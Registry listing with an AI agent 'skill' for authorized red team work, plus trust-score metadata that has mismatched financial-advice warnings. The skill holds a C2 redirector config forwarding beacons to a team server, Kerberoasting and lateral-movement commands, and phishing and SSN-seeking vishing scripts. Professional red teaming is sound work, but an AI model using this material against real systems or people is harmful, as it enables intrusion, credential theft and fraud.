{"slug":"masriyan-red-team-operations-engagement-planning","name":"Red Team Operations & Engagement Planning","description":"Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting","long_description":"---\nname: Red Team Operations & Engagement Planning\ndescription: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting\nversion: 3.0.0\nauthor: Masriyan\ntags: [cybersecurity, red-team, c2, lateral-movement, persistence, pentest, engagement, opsec]\n---\n\n# Red Team Operations & Engagement Planning\n\n## Purpose\n\nEnable Claude to assist authorized red team operators with engagement planning, C2 infrastructure design, attack methodology guidance, lateral movement strategy, OPSEC planning, and comprehensive reporting. Every workflow requires confirmed written authorization.\n\n> **CRITICAL — AUTHORIZATION GATE**: Red team assistance requires explicit authorization confirmation before proceeding. Claude will ask for authorization context and will not assist with active attack planning without it.\n>\n> **Authorized contexts:**\n> - Signed Statement of Work (SOW) or Rules of Engagement (ROE)\n> - Bug bounty program (confirm target is in-scope)\n> - Internal security testing (confirm organizational authority)\n> - CTF competition (confirm challenge platform and scope)\n> - Research in owned/isolated lab environment\n\n---\n\n## Activation Triggers\n\nThis skill activates when the user asks about:\n- Planning a red team engagement or adversary simulation\n- Designing C2 infrastructure (redirectors, team servers, C2 profiles)\n- Active Directory attack paths (BloodHound, Kerberoasting, DCSync)\n- Lateral movement techniques for authorized engagements\n- Persistence mechanisms in red team context\n- Social engineering campaign planning (authorized)\n- Red team reporting and executive presentations\n- Tabletop exercises (TTX) design\n- Purple team collaboration\n- OPSEC planning for authorized operations\n\n---\n\n## Prerequisites\n\n```bash\npip install pyyaml requests\n```\n\n**Tools for authorized operations:**\n- `Cobalt Strike / Sliver / Havoc` — C2 frameworks\n- `Metasploit` — Exploitation framework\n- `BloodHound / SharpHound` — AD attack path analysis\n- `Impacket` — Network protocol tools\n- `CrackMapExec / NetExec` — AD enumeration\n- `Responder` — LLMNR/NBT-NS poisoning\n- `Mimikatz` — Credential access (Windows)\n\n---\n\n## Authorization Verification\n\n**Before any operational planning, Claude asks:**\n\n```\nRed team assistance requires authorization confirmation:\n\n1. What is the engagement type?\n   □ External penetration test\n   □ Internal network assessment\n   □ Red team / adversary simulation\n   □ Social engineering assessment\n   □ Physical security assessment\n   □ CTF competition\n\n2. What is your authorization basis?\n   □ Signed SOW / contract with target organization\n   □ Internal role (IT/Security team testing own systems)\n   □ Bug bounty — [program name]\n   □ CTF — [platform and challenge name]\n\n3. What is the defined scope?\n   (IP ranges, domains, systems, excluded assets)\n\n4. Who is the target organization's security point of contact?\n   (For deconfliction — required for IR-level engagements)\n\nConfirm before proceeding. Operational assistance without confirmed\nauthorization cannot be provided.\n```\n\n---\n\n## Core Capabilities\n\n### 1. Engagement Planning\n\n**When the user asks to plan a red team engagement:**\n\n**Engagement Planning Framework:**\n\n```markdown\n# Red Team Engagement Plan\n**Client:** [Organization Name]\n**Engagement Type:** [Full Red Team / CRTO / APT Simulation]\n**Start Date:** [Date]\n**End Date:** [Date]\n**Rules of Engagement Version:** 1.0\n\n## Objectives\n- Primary: [e.g., Test detection and response capabilities against APT29 TTPs]\n- Secondary: [e.g., Identify privilege escalation paths to Domain Admin]\n- Out of Scope: [e.g., Production databases, payment systems, physical access]\n\n## Threat Profile\n**Simulating:** [APT29 / FIN7 / LockBit / Custom adversary profile]\n**Initial Access Vector:** [Spearphishing / Supply chain / Watering hole]\n**Primary Goal:** [Data exfiltration / Ransomware simulation / Domain takeover]\n\n## Attack Kill Chain Phases\n1. Reconnaissance → OSINT, subdomain enum (Skill 01)\n2. Initial Access → Phishing / external vuln exploitation\n3. Execution → PowerShell / LOLBins / custom implant\n4. Persistence → Registry / service / scheduled task\n5. Privilege Escalation → Local privesc → Domain Admin\n6. Defense Evasion → Process injection / AMSI bypass\n7. Credential Access → LSASS / Kerberoasting / DCSync\n8. Lateral Movement → PSExec / WMI / RDP\n9. Collection → Identify critical data\n10. Exfiltration → Staged transfer to simulated C2\n\n## Rules of Engagement\n- Testing hours: [24x7 / Business hours only / Agreed windows]\n- Destructive testing: [Prohibited / Limited / Authorized]\n- DoS testing: [Prohibited]\n- Social engineering: [Authorized / Prohibited / Phishing only]\n- Physical access: [Prohibited / Badge cloning only]\n- Deconfliction: Call [POC Name] at [Phone] if critical systems impacted\n\n## Emergency Abort Procedure\nIf critical systems are impacted unexpectedly:\n1. Immediately cease all operations\n2. Call [POC] at [Phone] — available 24/7\n3. Document what was done and when\n4. Stand down until authorized to resume\n```\n\n**Engagement Planning Script:**\n```bash\npython scripts/engagement_planner.py --scope scope.json --output plan.md\n```\n\n### 2. C2 Infrastructure Design\n\n**When the user asks about C2 infrastructure for authorized operations:**\n\n**Multi-Tier C2 Architecture:**\n\n```\n[Team Server] ← (internal/VPN only) → [Redirector 1 (HTTPS)] ← → [Beacon]\n                                    → [Redirector 2 (DNS)]   ← → [Beacon]\n                                    → [Backup Redirector]\n```\n\n**Infrastructure Components:**\n\n1. **Team Server** — Never directly exposed to internet; VPN access only\n2. **Redirectors** — Cloud VPS instances (AWS/Azure/GCP) that proxy C2 traffic\n3. **C2 Channels** — HTTPS (primary), DNS (backup), WebSocket (evasive)\n4. **Domain Selection** — Aged domains, categorized (business/tech), valid cert\n\n**Redirector Setup (Apache mod_rewrite):**\n```apache\n# Redirect only Cobalt Strike beacon traffic to team server\n# Everything else → sends to legitimate domain (blend in)\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} \"Mozilla/5.0 \\(Windows NT 6.1; WOW64\\) AppleWebKit.*\"\nRewriteCond %{REQUEST_URI} \"^/jquery-3\\.3\\.1\\.min\\.js$\"\nRewriteRule ^(.*)$ http://TEAMSERVER_IP/$1 [P,L]\nRewriteRule ^(.*)$ https://microsoft.com/ [R=302,L]  # Decoy redirect\n```\n\n**Malleable C2 Profile Considerations:**\n- Mimic legitimate application traffic (CDN requests, Office updates, etc.)\n- Match real User-Agent strings from target environment\n- Use appropriate HTTP headers (Host, Accept-Language, etc.)\n- Set sleep/jitter to blend with normal traffic intervals\n\n**OPSEC Checklist:**\n```\nInfrastructure OPSEC:\n[ ] Team server not directly accessible from internet\n[ ] All redirectors provisioned from different providers than each other\n[ ] Domain registered with privacy protection\n[ ] Domain aged ≥30 days before operation\n[ ] TLS certificate from legitimate CA (not self-signed)\n[ ] Kill dates set on all implants\n[ ] Logging enabled on team server for post-engagement review\n\nOperational OPSEC:\n[ ] VPN/Tor for infrastructure access (not home IP)\n[ ] Separate browser profile for research vs. operation\n[ ] No real name/email in domain registration\n[ ] Payment via anonymous method where legally permitted\n[ ] Implant config: sandbox detection, sleep with jitter\n[ ] All C2 traffic encrypted and indistinguishable from HTTPS\n```\n\n### 3. Active Directory Attack Methodology\n\n**When the user asks about AD attack paths for authorized engagements:**\n\n**BloodHound Analysis Workflow:**\n```bash\n# Collection (run on domain-joined host in scope)\n# PowerShell-based (noisier but complete)\nImport-Module SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -OutputDirectory C:\\temp\\\n\n# C# executable (quieter)\nSharpHound.exe -c All --outputdirectory C:\\temp\\\n\n# Upload ZIP to BloodHound UI and analyze:\n# Queries to run:\n# - Find Shortest Paths to Domain Admins\n# - Find Principals with DCSync Rights\n# - Find Computers with Unsupported Operating Systems\n# - Find AS-REP Roastable Users\n```\n\n**Key AD Attack Techniques (authorized):**\n\n| Technique | ATT&CK ID | Tool | Description |\n|-----------|-----------|------|-------------|\n| Kerberoasting | T1558.003 | Rubeus, Impacket | Request TGS for SPNs → crack offline |\n| AS-REP Roasting | T1558.004 | Rubeus, GetNPUsers.py | Users with no pre-auth required |\n| Pass-the-Hash | T1550.002 | Impacket, CrackMapExec | Use NTLM hash without cracking |\n| Pass-the-Ticket | T1550.003 | Rubeus | Use Kerberos ticket for auth |\n| Overpass-the-Hash | T1550.003 | Rubeus | Convert NTLM hash to TGT |\n| DCSync | T1003.006 | Mimikatz, Impacket | Replicate domain hashes |\n| Golden Ticket | T1558.001 | Mimikatz | Forge TGT with KRBTGT hash |\n| Silver Ticket | T1558.002 | Mimikatz | Forge TGS for specific service |\n\n**Kerberoasting (authorized use):**\n```bash\n# Using Impacket (Linux → Windows domain)\nGetUserSPNs.py -dc-ip 192.168.1.10 domain.local/user:password -request\n\n# Using Rubeus (on Windows, in scope)\nRubeus.exe kerberoast /outfile:hashes.txt\n\n# Crack with hashcat\nhashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt\n```\n\n**Lateral Movement Options:**\n```bash\n# PsExec style (via Impacket)\npsexec.py domain.local/admin:password@192.168.1.20\n\n# WMI execution\nwmiexec.py domain.local/admin:password@192.168.1.20\n\n# SMB with NetExec\nnxc smb 192.168.1.0/24 -u admin -p 'password' --shares\n\n# RDP (if authorized)\nrdesktop -u admin -p password 192.168.1.20\n```\n\n### 4. Social Engineering (Authorized Campaigns)\n\n**When the user asks to plan an authorized social engineering exercise:**\n\n**Phishing Campaign Framework:**\n\n1. **Scope confirmation** — What targets are authorized? What is prohibited?\n2. **Pretext development** — What scenario is believable for this organization?\n   - IT help desk password reset\n   - Finance: invoice / payment confirmation\n   - HR: benefits enrollment\n   - Executive: board communication\n3. **Infrastructure setup** — Phishing domain, email server, landing page\n4. **Landing page** — Credential harvester or payload delivery\n5. **Tracking** — Click tracking, credential capture, payload execution\n6. **Reporting metrics** — Click rate, credential submission rate, report rate\n\n**Pretext Template (for authorized campaigns):**\n```\nSubject: Action Required: IT Security Policy Update — Password Reset Required\n\nFrom: IT Help Desk <helpdesk@[spoofed-or-lookalike-domain]>\n\nDear [Name],\n\nAs part of our ongoing security improvements, all employees must update their\npasswords by [date]. Please click the link below to verify your identity and\nreset your password:\n\n[Phishing Link]\n\nIf you did not receive this email or have questions, contact the IT Help Desk\nat x4444.\n\nRegards,\nIT Security Team\n[Company Name]\n\n---\n[Include realistic footer with physical address, unsubscribe link for legitimacy]\n```\n\n**Vishing Script Template:**\n```\nCaller: \"Hi, this is [Name] from IT Security. We've detected some unusual \nactivity on your account. I need to verify your identity. Can I get your\nemployee ID and the last four digits of your SSN?...\"\n```\n\n### 5. Red Team Reporting\n\n**When the user asks to create a red team report:**\n\n```markdown\n# Red Team Assessment Report\n**CLIENT CONFIDENTIAL**\n\n**Organization:** [Client Name]\n**Assessment Type:** [Red Team / APT Simulation]\n**Assessment Period:** [Date] to [Date]\n**Report Date:** [Date]\n**Report Classification:** Client Confidential\n\n---\n\n## Executive Summary\n[2-3 paragraphs: what was tested, what was found at high level, \nkey recommendations. Written for non-technical executives.]\n\n**Overall Risk Rating:** [Critical / High / Medium / Low]\n\n**Key Findings:**\n1. Initial access achieved via [vector] within [timeframe]\n2. Domain Admin achieved via [technique] after [timeframe]\n3. Detection gap: [N] hours from initial access to detection\n4. [N] objectives achieved out of [N] defined\n\n---\n\n## Attack Timeline\n| Phase | Time | Action | Detection? |\n|-------|------|--------|-----------|\n|","tagline":"Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting","category":"design-creative","tags":["cybersecurity","red-team","c2","lateral-movement","persistence","pentest","engagement","opsec","agent-skill"],"author":"Masriyan","verified":false,"attribution":{"status":"registry_indexed","statusLabel":"Registry indexed","shortLabel":"REGISTRY INDEXED","sourceLabel":"github candidate review","sourceDetail":"Masriyan/Claude-Code-CyberSecurity-Skill","creatorName":"Masriyan","creatorUrl":"https://github.com/Masriyan","sourceUrl":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","indexedBy":"OpenAgentSkill community index","claimUrl":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning#claim-this-skill","claimCta":"Claim this skill","trustNote":"This listing was indexed from public sources and is not marked official until a maintainer claim is approved.","publicNote":"Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals."},"stats":{"stars":397,"forks":75,"verified_installs":0,"successful_runs":0,"total_outcomes":0,"rating":0,"review_count":0,"quality_score":45.45},"quality":{"score":77,"tier":"strong","label":"Strong","summary":"Solid option that is likely worth shortlisting for production workflows.","signals":[{"label":"GitHub stars","value":"397","tone":"neutral"},{"label":"Freshness","value":"2d ago","tone":"positive"},{"label":"Install ready","value":"Yes","tone":"positive"},{"label":"License","value":"MIT","tone":"neutral"}],"warnings":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced."]},"trust":{"version":"trust-score-v5","score":58,"base_score":66,"outcome_confidence":0,"tier":"risk","label":"Do not auto-install","summary":"Trust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.","recommendedAction":"Choose a stronger alternative or inspect the source manually before any install attempt.","decision":{"install_policy":"human_review_before_install","auto_install_allowed":false,"human_review_required":true,"sandbox_first":true,"agent_action":"Compare alternatives before installing.","reasoning":["58/100 Trust Score v5","66/100 Trust Score v4 baseline","Needs more real agent outcomes before unattended install","Install path is available","Review before production"],"review_required_when":["The workspace contains production secrets, payments, private customer data, or irreversible actions.","The install command requests shell, network, credential, database, or broad filesystem access.","Outcome evidence is missing, recently failed, or required human review.","Production credentials, payments, or irreversible account changes without explicit human review","Sensitive private data before reviewing repository code, license, and permission surface","Automatic installation in a production workspace"]},"dimensions":[{"id":"github_adoption","label":"GitHub adoption","score":62,"weight":0.13,"status":"info","detail":"397 GitHub stars"},{"id":"repo_activity","label":"Stars/forks activity","score":62,"weight":0.08,"status":"info","detail":"397 stars, 75 forks; issue activity unavailable in current metadata"},{"id":"maintenance","label":"Recent maintenance","score":100,"weight":0.14,"status":"pass","detail":"2d since push"},{"id":"license","label":"License clarity","score":86,"weight":0.09,"status":"pass","detail":"MIT"},{"id":"documentation","label":"README/SKILL.md completeness","score":94,"weight":0.14,"status":"pass","detail":"Metadata includes enough usage and workflow context"},{"id":"dependency_risk","label":"Dependency/runtime risk","score":36,"weight":0.12,"status":"fail","detail":"command execution surface, credential or environment access"},{"id":"installability","label":"Install availability","score":92,"weight":0.1,"status":"pass","detail":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning"},{"id":"install_safety","label":"Install command safety","score":92,"weight":0.1,"status":"pass","detail":"standard package or runtime install path"},{"id":"permission_surface","label":"Permission surface","score":22,"weight":0.07,"status":"fail","detail":"secrets or environment access, shell or command execution"},{"id":"repository","label":"Repository evidence","score":86,"weight":0.04,"status":"pass","detail":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops"},{"id":"review_status","label":"Review status","score":66,"weight":0.05,"status":"info","detail":"AI review data available"},{"id":"agent_outcomes","label":"Agent Proven outcomes","score":54,"weight":0.13,"status":"info","detail":"No agent outcome data yet"}],"checks":[{"status":"info","label":"GitHub adoption","detail":"397 GitHub stars"},{"status":"info","label":"Stars/forks activity","detail":"397 stars, 75 forks; issue activity unavailable in current metadata"},{"status":"pass","label":"Recent maintenance","detail":"2d since push"},{"status":"pass","label":"License clarity","detail":"MIT"},{"status":"pass","label":"README/SKILL.md completeness","detail":"Metadata includes enough usage and workflow context"},{"status":"fail","label":"Dependency/runtime risk","detail":"command execution surface, credential or environment access"},{"status":"pass","label":"Install availability","detail":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning"},{"status":"pass","label":"Install command safety","detail":"standard package or runtime install path"},{"status":"fail","label":"Permission surface","detail":"secrets or environment access, shell or command execution"},{"status":"pass","label":"Repository evidence","detail":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops"},{"status":"info","label":"Review status","detail":"AI review data available"},{"status":"info","label":"Agent Proven outcomes","detail":"No agent outcome data yet"},{"status":"warn","label":"Ownership","detail":"No approved owner claim yet"},{"status":"info","label":"OpenAgentSkill usage","detail":"No local usage activity yet"},{"status":"info","label":"Agent outcomes","detail":"No agent outcome data yet"}],"strengths":["AI review approved","Install path is available","Repository evidence is available","Recently maintained repository","Install command has no obvious high-risk pattern","Outcome loop is ready but needs first real agent run"],"warnings":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution","No real agent outcome reports yet","Human review required before unattended installation"],"evidence":{"stars":"397 GitHub stars","repoActivity":"397 stars, 75 forks","lastPushed":"2d since push","license":"MIT","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","install":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","installSafety":"standard package or runtime install path","permissionSurface":"secrets or environment access, shell or command execution","documentation":"Strong README/SKILL.md context","agentOutcomes":"No agent outcome data yet","agentProvenScore":0,"outcomeConfidence":"0%","installPolicy":"human_review_before_install"},"installReadiness":{"ready":true,"command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","policy":"human_review_before_install","label":"Human review before install","notes":["Install path is available","Repository evidence is available","License is declared","No Agent Proven outcome evidence yet","2d since push","Financial domain: human review is required before use in a live investment workflow.","Trust Score v5 requires review or sandbox-only use before install."]},"agentCompatibility":["Codex","Claude Code","Cursor","OpenAgentSkill CLI"],"riskSummary":{"level":"medium","label":"Review before production","notes":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access"]},"outcomeEvidence":{"total":0,"successes":0,"failures":0,"notRelevant":0,"successRate":null,"installAttempts":0,"riskBlocked":0,"setupRequired":0,"installSuccessRate":null,"avgOutputQuality":null,"avgTimeToUsefulMs":null,"productionOutcomes":0,"humanReviewRequired":0,"recentSuccessRate":null,"recentFailureRate":null,"uniqueAgents":0,"agentProvenScore":0,"agentProvenLabel":"Needs first agent run","lastOutcomeAt":null,"label":"No agent outcome data yet"},"autoInstall":{"allowed":false,"sandboxRequired":true,"policy":"human_review_before_install","reason":"Compare alternatives before installing."},"outcome_loop":{"version":"openagentskill-agent-outcome-v4","required_after_install":true,"endpoint":"/api/agent/outcome","method":"POST","event_id_source":"feedback.event_id, install_receipt.resolve_event_id, or decision_packet.outcome_feedback.event_id","expected_outcomes":["success","failed","not_relevant","blocked_by_risk","setup_required"],"required_fields":["event_id","skill_slug","task"],"quality_fields":["task_success","output_quality","error_type","human_review_required","used_in_production","workspace","evidence_url","time_to_useful_ms","source_version"],"ranking_inputs_updated":["Trust Score v5 outcome confidence","Agent Proven Score","Resolve ranking task-fit evidence","Skill detail machine-readable metadata","Outcome leaderboard"]},"agent_contract":{"suited_tasks":["design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"],"suited_agents":["Codex","Claude Code","Cursor","OpenAgentSkill CLI"],"install_command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","trust_score":58,"trust_version":"trust-score-v5","risk_level":"medium","do_not_use_when":["Production credentials, payments, or irreversible account changes without explicit human review","Sensitive private data before reviewing repository code, license, and permission surface","Automatic installation in a production workspace","Autonomous investment, trading, tax, or suitability decisions without a qualified human review"],"before_install":["Read the audit page and machine-readable metadata.","Confirm the install command, license, and permission surface fit the workspace.","Get explicit human approval or choose an alternative before installing."],"after_run":["Report the outcome to /api/agent/outcome using the resolve event id.","Include output_quality, workspace, human_review_required, and evidence_url when available.","Re-resolve before broad production rollout."]},"bestFor":["design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"],"doNotUseFor":["Production credentials, payments, or irreversible account changes without explicit human review","Sensitive private data before reviewing repository code, license, and permission surface","Automatic installation in a production workspace","Autonomous investment, trading, tax, or suitability decisions without a qualified human review"],"knownRisks":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution"],"backward_compatible":{"trust_score_v4":{"version":"trust-score-v4","score":66,"tier":"review","label":"Manual review","summary":"Potentially useful, but at least one trust signal needs human inspection."}}},"trust_score_v5":{"version":"trust-score-v5","score":58,"base_score":66,"outcome_confidence":0,"tier":"risk","label":"Do not auto-install","summary":"Trust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.","recommendedAction":"Choose a stronger alternative or inspect the source manually before any install attempt.","decision":{"install_policy":"human_review_before_install","auto_install_allowed":false,"human_review_required":true,"sandbox_first":true,"agent_action":"Compare alternatives before installing.","reasoning":["58/100 Trust Score v5","66/100 Trust Score v4 baseline","Needs more real agent outcomes before unattended install","Install path is available","Review before production"],"review_required_when":["The workspace contains production secrets, payments, private customer data, or irreversible actions.","The install command requests shell, network, credential, database, or broad filesystem access.","Outcome evidence is missing, recently failed, or required human review.","Production credentials, payments, or irreversible account changes without explicit human review","Sensitive private data before reviewing repository code, license, and permission surface","Automatic installation in a production workspace"]},"dimensions":[{"id":"github_adoption","label":"GitHub adoption","score":62,"weight":0.13,"status":"info","detail":"397 GitHub stars"},{"id":"repo_activity","label":"Stars/forks activity","score":62,"weight":0.08,"status":"info","detail":"397 stars, 75 forks; issue activity unavailable in current metadata"},{"id":"maintenance","label":"Recent maintenance","score":100,"weight":0.14,"status":"pass","detail":"2d since push"},{"id":"license","label":"License clarity","score":86,"weight":0.09,"status":"pass","detail":"MIT"},{"id":"documentation","label":"README/SKILL.md completeness","score":94,"weight":0.14,"status":"pass","detail":"Metadata includes enough usage and workflow context"},{"id":"dependency_risk","label":"Dependency/runtime risk","score":36,"weight":0.12,"status":"fail","detail":"command execution surface, credential or environment access"},{"id":"installability","label":"Install availability","score":92,"weight":0.1,"status":"pass","detail":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning"},{"id":"install_safety","label":"Install command safety","score":92,"weight":0.1,"status":"pass","detail":"standard package or runtime install path"},{"id":"permission_surface","label":"Permission surface","score":22,"weight":0.07,"status":"fail","detail":"secrets or environment access, shell or command execution"},{"id":"repository","label":"Repository evidence","score":86,"weight":0.04,"status":"pass","detail":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops"},{"id":"review_status","label":"Review status","score":66,"weight":0.05,"status":"info","detail":"AI review data available"},{"id":"agent_outcomes","label":"Agent Proven outcomes","score":54,"weight":0.13,"status":"info","detail":"No agent outcome data yet"}],"checks":[{"status":"info","label":"GitHub adoption","detail":"397 GitHub stars"},{"status":"info","label":"Stars/forks activity","detail":"397 stars, 75 forks; issue activity unavailable in current metadata"},{"status":"pass","label":"Recent maintenance","detail":"2d since push"},{"status":"pass","label":"License clarity","detail":"MIT"},{"status":"pass","label":"README/SKILL.md completeness","detail":"Metadata includes enough usage and workflow context"},{"status":"fail","label":"Dependency/runtime risk","detail":"command execution surface, credential or environment access"},{"status":"pass","label":"Install availability","detail":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning"},{"status":"pass","label":"Install command safety","detail":"standard package or runtime install path"},{"status":"fail","label":"Permission surface","detail":"secrets or environment access, shell or command execution"},{"status":"pass","label":"Repository evidence","detail":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops"},{"status":"info","label":"Review status","detail":"AI review data available"},{"status":"info","label":"Agent Proven outcomes","detail":"No agent outcome data yet"},{"status":"warn","label":"Ownership","detail":"No approved owner claim yet"},{"status":"info","label":"OpenAgentSkill usage","detail":"No local usage activity yet"},{"status":"info","label":"Agent outcomes","detail":"No agent outcome data yet"}],"strengths":["AI review approved","Install path is available","Repository evidence is available","Recently maintained repository","Install command has no obvious high-risk pattern","Outcome loop is ready but needs first real agent run"],"warnings":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution","No real agent outcome reports yet","Human review required before unattended installation"],"evidence":{"stars":"397 GitHub stars","repoActivity":"397 stars, 75 forks","lastPushed":"2d since push","license":"MIT","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","install":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","installSafety":"standard package or runtime install path","permissionSurface":"secrets or environment access, shell or command execution","documentation":"Strong README/SKILL.md context","agentOutcomes":"No agent outcome data yet","agentProvenScore":0,"outcomeConfidence":"0%","installPolicy":"human_review_before_install"},"installReadiness":{"ready":true,"command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","policy":"human_review_before_install","label":"Human review before install","notes":["Install path is available","Repository evidence is available","License is declared","No Agent Proven outcome evidence yet","2d since push","Financial domain: human review is required before use in a live investment workflow.","Trust Score v5 requires review or sandbox-only use before install."]},"agentCompatibility":["Codex","Claude Code","Cursor","OpenAgentSkill CLI"],"riskSummary":{"level":"medium","label":"Review before production","notes":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access"]},"outcomeEvidence":{"total":0,"successes":0,"failures":0,"notRelevant":0,"successRate":null,"installAttempts":0,"riskBlocked":0,"setupRequired":0,"installSuccessRate":null,"avgOutputQuality":null,"avgTimeToUsefulMs":null,"productionOutcomes":0,"humanReviewRequired":0,"recentSuccessRate":null,"recentFailureRate":null,"uniqueAgents":0,"agentProvenScore":0,"agentProvenLabel":"Needs first agent run","lastOutcomeAt":null,"label":"No agent outcome data yet"},"autoInstall":{"allowed":false,"sandboxRequired":true,"policy":"human_review_before_install","reason":"Compare alternatives before installing."},"outcome_loop":{"version":"openagentskill-agent-outcome-v4","required_after_install":true,"endpoint":"/api/agent/outcome","method":"POST","event_id_source":"feedback.event_id, install_receipt.resolve_event_id, or decision_packet.outcome_feedback.event_id","expected_outcomes":["success","failed","not_relevant","blocked_by_risk","setup_required"],"required_fields":["event_id","skill_slug","task"],"quality_fields":["task_success","output_quality","error_type","human_review_required","used_in_production","workspace","evidence_url","time_to_useful_ms","source_version"],"ranking_inputs_updated":["Trust Score v5 outcome confidence","Agent Proven Score","Resolve ranking task-fit evidence","Skill detail machine-readable metadata","Outcome leaderboard"]},"agent_contract":{"suited_tasks":["design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"],"suited_agents":["Codex","Claude Code","Cursor","OpenAgentSkill CLI"],"install_command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","trust_score":58,"trust_version":"trust-score-v5","risk_level":"medium","do_not_use_when":["Production credentials, payments, or irreversible account changes without explicit human review","Sensitive private data before reviewing repository code, license, and permission surface","Automatic installation in a production workspace","Autonomous investment, trading, tax, or suitability decisions without a qualified human review"],"before_install":["Read the audit page and machine-readable metadata.","Confirm the install command, license, and permission surface fit the workspace.","Get explicit human approval or choose an alternative before installing."],"after_run":["Report the outcome to /api/agent/outcome using the resolve event id.","Include output_quality, workspace, human_review_required, and evidence_url when available.","Re-resolve before broad production rollout."]},"bestFor":["design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"],"doNotUseFor":["Production credentials, payments, or irreversible account changes without explicit human review","Sensitive private data before reviewing repository code, license, and permission surface","Automatic installation in a production workspace","Autonomous investment, trading, tax, or suitability decisions without a qualified human review"],"knownRisks":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution"],"backward_compatible":{"trust_score_v4":{"version":"trust-score-v4","score":66,"tier":"review","label":"Manual review","summary":"Potentially useful, but at least one trust signal needs human inspection."}}},"trust_score_v4":{"version":"trust-score-v4","score":66,"tier":"review","label":"Manual review","summary":"Potentially useful, but at least one trust signal needs human inspection.","recommendedAction":"Inspect the repository, license, and recent activity before connecting it to agent workflows.","dimensions":[{"id":"github_adoption","label":"GitHub adoption","score":62,"weight":0.13,"status":"info","detail":"397 GitHub stars"},{"id":"repo_activity","label":"Stars/forks activity","score":62,"weight":0.08,"status":"info","detail":"397 stars, 75 forks; issue activity unavailable in current metadata"},{"id":"maintenance","label":"Recent maintenance","score":100,"weight":0.14,"status":"pass","detail":"2d since push"},{"id":"license","label":"License clarity","score":86,"weight":0.09,"status":"pass","detail":"MIT"},{"id":"documentation","label":"README/SKILL.md completeness","score":94,"weight":0.14,"status":"pass","detail":"Metadata includes enough usage and workflow context"},{"id":"dependency_risk","label":"Dependency/runtime risk","score":36,"weight":0.12,"status":"fail","detail":"command execution surface, credential or environment access"},{"id":"installability","label":"Install availability","score":92,"weight":0.1,"status":"pass","detail":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team 